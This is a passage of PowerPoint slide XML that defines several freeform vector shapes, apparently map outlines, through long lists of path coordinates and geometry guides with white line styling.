                  <a:gd name="T88" fmla="*/ 149 w 159"/>
                  <a:gd name="T89" fmla="*/ 19 h 145"/>
                  <a:gd name="T90" fmla="*/ 151 w 159"/>
                  <a:gd name="T91" fmla="*/ 25 h 145"/>
                  <a:gd name="T92" fmla="*/ 156 w 159"/>
                  <a:gd name="T93" fmla="*/ 52 h 145"/>
                  <a:gd name="T94" fmla="*/ 147 w 159"/>
                  <a:gd name="T95" fmla="*/ 58 h 145"/>
                  <a:gd name="T96" fmla="*/ 146 w 159"/>
                  <a:gd name="T97" fmla="*/ 65 h 145"/>
                  <a:gd name="T98" fmla="*/ 152 w 159"/>
                  <a:gd name="T99" fmla="*/ 70 h 145"/>
                  <a:gd name="T100" fmla="*/ 150 w 159"/>
                  <a:gd name="T101" fmla="*/ 84 h 145"/>
                  <a:gd name="T102" fmla="*/ 157 w 159"/>
                  <a:gd name="T103" fmla="*/ 98 h 145"/>
                  <a:gd name="T104" fmla="*/ 156 w 159"/>
                  <a:gd name="T105" fmla="*/ 102 h 145"/>
                  <a:gd name="T106" fmla="*/ 157 w 159"/>
                  <a:gd name="T107" fmla="*/ 112 h 145"/>
                  <a:gd name="T108" fmla="*/ 147 w 159"/>
                  <a:gd name="T109" fmla="*/ 118 h 145"/>
                  <a:gd name="T110" fmla="*/ 136 w 159"/>
                  <a:gd name="T111" fmla="*/ 141 h 145"/>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159"/>
                  <a:gd name="T169" fmla="*/ 0 h 145"/>
                  <a:gd name="T170" fmla="*/ 159 w 159"/>
                  <a:gd name="T171" fmla="*/ 145 h 145"/>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159" h="145">
                    <a:moveTo>
                      <a:pt x="134" y="145"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="128" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="145"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36112" name="Freeform 245"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2965" y="1926"/>
                <a:ext cx="4" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 4"/>
                  <a:gd name="T1" fmla="*/ 1 h 2"/>
                  <a:gd name="T2" fmla="*/ 4 w 4"/>
                  <a:gd name="T3" fmla="*/ 2 h 2"/>
                  <a:gd name="T4" fmla="*/ 2 w 4"/>
                  <a:gd name="T5" fmla="*/ 2 h 2"/>
                  <a:gd name="T6" fmla="*/ 0 w 4"/>
                  <a:gd name="T7" fmla="*/ 2 h 2"/>
                  <a:gd name="T8" fmla="*/ 0 w 4"/>
                  <a:gd name="T9" fmla="*/ 0 h 2"/>
                  <a:gd name="T10" fmla="*/ 1 w 4"/>
                  <a:gd name="T11" fmla="*/ 0 h 2"/>
                  <a:gd name="T12" fmla="*/ 3 w 4"/>
                  <a:gd name="T13" fmla="*/ 0 h 2"/>
                  <a:gd name="T14" fmla="*/ 4 w 4"/>
                  <a:gd name="T15" fmla="*/ 1 h 2"/>
                  <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T18" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T19" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T20" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T21" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T22" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T23" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T24" fmla="*/ 0 w 4"/>
                  <a:gd name="T25" fmla="*/ 0 h 2"/>
                  <a:gd name="T26" fmla="*/ 4 w 4"/>
                  <a:gd name="T27" fmla="*/ 2 h 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 h="2">
                    <a:moveTo>
                      <a:pt x="4" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36113" name="Freeform 246"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2962" y="1926"/>
                <a:ext cx="3" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 2 w 3"/>
                  <a:gd name="T3" fmla="*/ 0 h 2"/>
                  <a:gd name="T4" fmla="*/ 3 w 3"/>
                  <a:gd name="T5" fmla="*/ 2 h 2"/>
                  <a:gd name="T6" fmla="*/ 2 w 3"/>
                  <a:gd name="T7" fmla="*/ 2 h 2"/>
                  <a:gd name="T8" fmla="*/ 0 w 3"/>
                  <a:gd name="T9" fmla="*/ 0 h 2"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 3"/>
                  <a:gd name="T16" fmla="*/ 0 h 2"/>
                  <a:gd name="T17" fmla="*/ 3 w 3"/>
                  <a:gd name="T18" fmla="*/ 2 h 2"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="3" h="2">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36114" name="Freeform 247"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2469" y="2496"/>
                <a:ext cx="193" cy="210"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 71 w 193"/>
                  <a:gd name="T1" fmla="*/ 203 h 210"/>
                  <a:gd name="T2" fmla="*/ 62 w 193"/>
                  <a:gd name="T3" fmla="*/ 193 h 210"/>
                  <a:gd name="T4" fmla="*/ 59 w 193"/>
                  <a:gd name="T5" fmla="*/ 187 h 210"/>
                  <a:gd name="T6" fmla="*/ 53 w 193"/>
                  <a:gd name="T7" fmla="*/ 185 h 210"/>
                  <a:gd name="T8" fmla="*/ 43 w 193"/>
                  <a:gd name="T9" fmla="*/ 179 h 210"/>
                  <a:gd name="T10" fmla="*/ 35 w 193"/>
                  <a:gd name="T11" fmla="*/ 177 h 210"/>
                  <a:gd name="T12" fmla="*/ 13 w 193"/>
                  <a:gd name="T13" fmla="*/ 180 h 210"/>
                  <a:gd name="T14" fmla="*/ 10 w 193"/>
                  <a:gd name="T15" fmla="*/ 179 h 210"/>
                  <a:gd name="T16" fmla="*/ 16 w 193"/>
                  <a:gd name="T17" fmla="*/ 163 h 210"/>
                  <a:gd name="T18" fmla="*/ 15 w 193"/>
                  <a:gd name="T19" fmla="*/ 146 h 210"/>
                  <a:gd name="T20" fmla="*/ 9 w 193"/>
                  <a:gd name="T21" fmla="*/ 135 h 210"/>
                  <a:gd name="T22" fmla="*/ 12 w 193"/>
                  <a:gd name="T23" fmla="*/ 130 h 210"/>
                  <a:gd name="T24" fmla="*/ 12 w 193"/>
                  <a:gd name="T25" fmla="*/ 118 h 210"/>
                  <a:gd name="T26" fmla="*/ 5 w 193"/>
                  <a:gd name="T27" fmla="*/ 109 h 210"/>
                  <a:gd name="T28" fmla="*/ 0 w 193"/>
                  <a:gd name="T29" fmla="*/ 112 h 210"/>
                  <a:gd name="T30" fmla="*/ 0 w 193"/>
                  <a:gd name="T31" fmla="*/ 107 h 210"/>
                  <a:gd name="T32" fmla="*/ 3 w 193"/>
                  <a:gd name="T33" fmla="*/ 102 h 210"/>
                  <a:gd name="T34" fmla="*/ 57 w 193"/>
                  <a:gd name="T35" fmla="*/ 103 h 210"/>
                  <a:gd name="T36" fmla="*/ 63 w 193"/>
                  <a:gd name="T37" fmla="*/ 103 h 210"/>
                  <a:gd name="T38" fmla="*/ 62 w 193"/>
                  <a:gd name="T39" fmla="*/ 82 h 210"/>
                  <a:gd name="T40" fmla="*/ 64 w 193"/>
                  <a:gd name="T41" fmla="*/ 74 h 210"/>
                  <a:gd name="T42" fmla="*/ 73 w 193"/>
                  <a:gd name="T43" fmla="*/ 68 h 210"/>
                  <a:gd name="T44" fmla="*/ 80 w 193"/>
                  <a:gd name="T45" fmla="*/ 65 h 210"/>
                  <a:gd name="T46" fmla="*/ 81 w 193"/>
                  <a:gd name="T47" fmla="*/ 27 h 210"/>
                  <a:gd name="T48" fmla="*/ 85 w 193"/>
                  <a:gd name="T49" fmla="*/ 22 h 210"/>
                  <a:gd name="T50" fmla="*/ 132 w 193"/>
                  <a:gd name="T51" fmla="*/ 22 h 210"/>
                  <a:gd name="T52" fmla="*/ 133 w 193"/>
                  <a:gd name="T53" fmla="*/ 14 h 210"/>
                  <a:gd name="T54" fmla="*/ 153 w 193"/>
                  <a:gd name="T55" fmla="*/ 12 h 210"/>
                  <a:gd name="T56" fmla="*/ 193 w 193"/>
                  <a:gd name="T57" fmla="*/ 39 h 210"/>
                  <a:gd name="T58" fmla="*/ 166 w 193"/>
                  <a:gd name="T59" fmla="*/ 40 h 210"/>
                  <a:gd name="T60" fmla="*/ 173 w 193"/>
                  <a:gd name="T61" fmla="*/ 108 h 210"/>
                  <a:gd name="T62" fmla="*/ 176 w 193"/>
                  <a:gd name="T63" fmla="*/ 132 h 210"/>
                  <a:gd name="T64" fmla="*/ 179 w 193"/>
                  <a:gd name="T65" fmla="*/ 171 h 210"/>
                  <a:gd name="T66" fmla="*/ 186 w 193"/>
                  <a:gd name="T67" fmla="*/ 188 h 210"/>
                  <a:gd name="T68" fmla="*/ 137 w 193"/>
                  <a:gd name="T69" fmla="*/ 200 h 210"/>
                  <a:gd name="T70" fmla="*/ 116 w 193"/>
                  <a:gd name="T71" fmla="*/ 202 h 210"/>
                  <a:gd name="T72" fmla="*/ 110 w 193"/>
                  <a:gd name="T73" fmla="*/ 202 h 210"/>
                  <a:gd name="T74" fmla="*/ 101 w 193"/>
                  <a:gd name="T75" fmla="*/ 200 h 210"/>
                  <a:gd name="T76" fmla="*/ 101 w 193"/>
                  <a:gd name="T77" fmla="*/ 204 h 210"/>
                  <a:gd name="T78" fmla="*/ 97 w 193"/>
                  <a:gd name="T79" fmla="*/ 205 h 210"/>
                  <a:gd name="T80" fmla="*/ 91 w 193"/>
                  <a:gd name="T81" fmla="*/ 198 h 210"/>
                  <a:gd name="T82" fmla="*/ 87 w 193"/>
                  <a:gd name="T83" fmla="*/ 198 h 210"/>
                  <a:gd name="T84" fmla="*/ 84 w 193"/>
                  <a:gd name="T85" fmla="*/ 204 h 210"/>
                  <a:gd name="T86" fmla="*/ 81 w 193"/>
                  <a:gd name="T87" fmla="*/ 210 h 210"/>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93"/>
                  <a:gd name="T133" fmla="*/ 0 h 210"/>
                  <a:gd name="T134" fmla="*/ 193 w 193"/>
                  <a:gd name="T135" fmla="*/ 210 h 210"/>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93" h="210">
                    <a:moveTo>
                      <a:pt x="81" y="210"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="71" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="107"/>
